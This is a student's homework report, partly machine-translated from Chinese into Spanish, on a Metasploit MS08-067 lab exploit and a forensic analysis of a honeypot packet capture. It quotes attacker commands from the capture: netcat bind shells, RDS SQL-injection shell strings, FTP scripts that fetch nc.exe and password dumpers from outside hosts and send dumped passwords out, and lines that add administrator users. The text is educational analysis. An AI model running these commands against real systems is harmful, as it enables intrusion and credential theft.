Curso de asignación: https://edu.cnblogs.com/campus/besti/19attackdefense/
Requisitos de asignación: https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612
Practica contenido
| Nombre del sitio | URL del sitio de código penetrante | Clasificación e índice |
|---|---|---|
| Explotar-db | www.exploit-db.com | Directorio / Índice |
| tormenta de paquetes | https://packetstormsecurity.com/ | etiqueta / sin índice |
| enfoque de seguridad | https://www.securityfocus.com/bid | Catálogo / índice de vulnerabilidad |
| razones de seguridad | https://cxsecurity.com/exploit/ | Sin directorio ni índice |
| Vulnas de seguridad | https://vulners.com/search?query=type:securityvulns&utm_source=securityvulns&utm_medium=redirect | Sin directorio ni índice |
Contenido: utilice la máquina de ataque de ataque de Windows / BT4 para intentar un ataque de penetración remota en la vulnerabilidad MS08_067 en la máquina de destino metaplotable de Windows para obtener acceso al host de destino.
Descripción de MS08_067:
Encontré la consola de metasploit en winattack, el inicio es un poco lento.
Establecer la vulnerabilidad al ataque
Establecer el módulo de carga, windows / meterpreter / reverse_tcp establece una conexión inversa entre la máquina de destino y el probador: la carga se divide en individual, escalonado y etapa
Establecer parámetros
Luego me encontré con un problema de este tipo: no se pudo cargar el módulo y el servidor respondió con un error: STATUS_PIPE_NOT_AVAILABLE, parece que se debe al problema del objetivo, y la miel puede haber estado durante mucho tiempo, estoy en un estado de no iniciar sesión y el host de destino puede estar atascado Problema
En intentos posteriores, no se muestra ningún objetivo coincidente. La versión en inglés puede no ser adecuada para este objetivo, por lo que la máquina objetivo se reemplaza con win2kserver. Sesión establecida con éxito:
Ingrese el shell e ingrese la línea de comando del sistema remoto:
Ver todos los usuarios usuario neto:
Cree una puerta trasera de baja calidad, active el invitado, restablezca su contraseña y configúrelo como administrador
Utilice el escritorio remoto para probar: escritorio remoto
Win + R mstsc, complete la IP de la máquina de destino y conecte:
Ingrese el nombre de usuario invitado y la raíz de contraseña
Ingrese al sistema después de confirmar:
Análisis forense
Usando wirshark para abrir el archivo de registro, puede ver que el atacante está usando un puerto diferente para establecer una conexión con el puerto 80 del objetivo.
En este registro, se muestra la solicitud HTTP GET y puede ver que el extremo solicitante utiliza el sistema IE5, Windows NT 5.0.
La máquina atacante hace una solicitud para ver algunas imágenes.
La ubicación marcada por la imagen parece un poco extraña. Vamos a rastrear el flujo de TCP:
En la solicitud, el campo% c0% AF% se repitió tres veces. Después de Baidu, se supo que esta es la codificación Unicode de "/", y existe una vulnerabilidad de recorrido de directorio Unicode en IIS 4.0 y 5.0.
Al filtrar la solicitud http que contiene dichos caracteres, puede ver el proceso de ataque Unicode:
primero copió un cmd.exe, tenga en cuenta que los + que se muestran en la figura son todos espacios.
Después: escriba open 213.116.251.162 en el script ftpcom.
Johna2k写到脚本中。
nc –l –p 6969 –e cmd1.exe
nc –l –p 6968 –e cmd1.exe
nc –l –p 6868 –e cmd1.exe
在之后又有一波新的轮回,有点不一样的是,这次还写进了压缩文件
最后删除了这个脚本:
之后又有一个这样的请求:GET /msadc/ 的目录
了解到,在IIS服务器中,msadc虚拟目录内有个名为msadcs.dll提供RDS服务,RDS是微软提供的远程访问数据库服务。该系统漏洞允许任意代码执行,GET /msadc/msadcs.dll HTTP是用来探测受害主机上是否有这个漏洞,之后多次进行这样的HTTP会话请求进行SQL注入。
根据上面字符串,可以看出是一个SQL查询语句,使用|shell(“cmd /c echo werd>>c:\fun”)|进行web攻击的SQL注入。红框中这个东西又让人觉得很魔性,像是什么斯巴达!这感叹号用的。
谷歌上找到一本书中有对这句话的描述:
可以看出这个语句是脚本里用来做探测用的,把这本书往前翻,看到这里所说的脚本应该是指msadc.p1
经过观察,每一个url为请求上都有一堆上述的那种东西,过滤一下http.request.uri,可以看到后面的请求中,有shell(“cmd/ c echo hacker2000 >>ftpcom”)
shell(“cmd/ c echo get samdump.dll >>ftpcom”)
shell(“cmd/ c echo get pdump.dll >>ftpcom”)
shell(“cmd/ c echo get nc.exe >>ftpcom”)
shell(“cmd/ c echo quit >>ftpcom”)
shell(“cmd/ c ftp –s: ftpcom –n www.nether.net”)
shell(“cmd/ c pdump.exe >> new.pass”)
shell(“cmd/ c echo user johna2k >> ftpcom2”)
shell(“cmd/ c echo hacker2000 >>ftpcom2”)
shell(“cmd/ c put new pass >> ftpcom2”)
shell(“cmd/ c echo quit >> ftpcom2”)
shell(“cmd/ c ftp -s ftpcom2 –n www.nether.net”)
shell(“cmd/ c ftp 213.116.251.162”)
Echo open 213.116.251.162 这是让目的主机连接自己
重复的不再写了。
echo get samdump.dll >> ftpcom
ftp –s ftpcom
Open 212.139.12.26
Echo johna2k >> sasfile
Echo haxedj00 >> sasfile
Echo get pdump.exe >> sasfile
Echo get samdump.dll
Echo get nc.exe >>sasfile
Echo quit >> sasfile
查看了目的主机上的用户
net localgroup Domain Admins IWAM KENNY/ADD IWAN主机名是启动iis进程账户
Net user testuser ugotHacked /ADD应该是加了个用户和密码
把创建的这个用户名加入到管理员组中
rdisk -/s 不知道是用来干啥的,看了被人的博客,说是rdisk为磁盘修复程序,rdisk /s-用于备份关键系统信息,获得SAM口令文件,SAM是安全账号管理器。
下面又有rdisk –s 和rdisk ,rdist –s ……
之后,将SAM放到har.txt文件
之后再第166个tcp流中找到了对hat.txt的GET请求,在往前翻一个TCP流,没有什么特别,但是进行TCP跟踪,就会看到
这样的shell操作,可以看到交互情况。大概就是在看文件夹里的内容,然后删掉一些痕迹,复制一些文件下来
再之后,读到了这样一条消息,到rfp.txt best honeypot I’ve seen till now,攻击者到这时已经知道这是个蜜罐了。
大概就是两种攻击,一个是unicode编码攻击,一个是根据msadc漏洞的SQL 注入攻击。
工具pdump.exe nc.exe实现对目标主机的攻击。
为了防止这样的攻击,就是该打补丁就赶紧打补丁,不需要的远程的服务该关掉就关掉。
团队对抗实践:windows系统远程渗透攻击与分析
实践内容和第一个实践内容一样。只是多加了个wireshark监控。用两个IP地址进行过滤。
MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。
所以,在两个IP之间的交互中会看到很多的SMB协议的数据包。可以看到,身份认证协议用的是LANMAN,不安全。
192.168.200.2主动与192.168.200.124建立连接。
192.168.200.2发起请求。
源IP 192.168.200.2
目标IP192.168.200.124 端口445
攻击发起时间:发送第一个ARP数据包开始
遇到的问题/font>
1、选择目标主机不当,浪费了很多时间。
2、分析log的时候,无从下手,看别人的博客,才静下心来一条一条的看记录。
学习体会/font>
以后写作业要灵活,开阔眼界,不要钻牛角尖。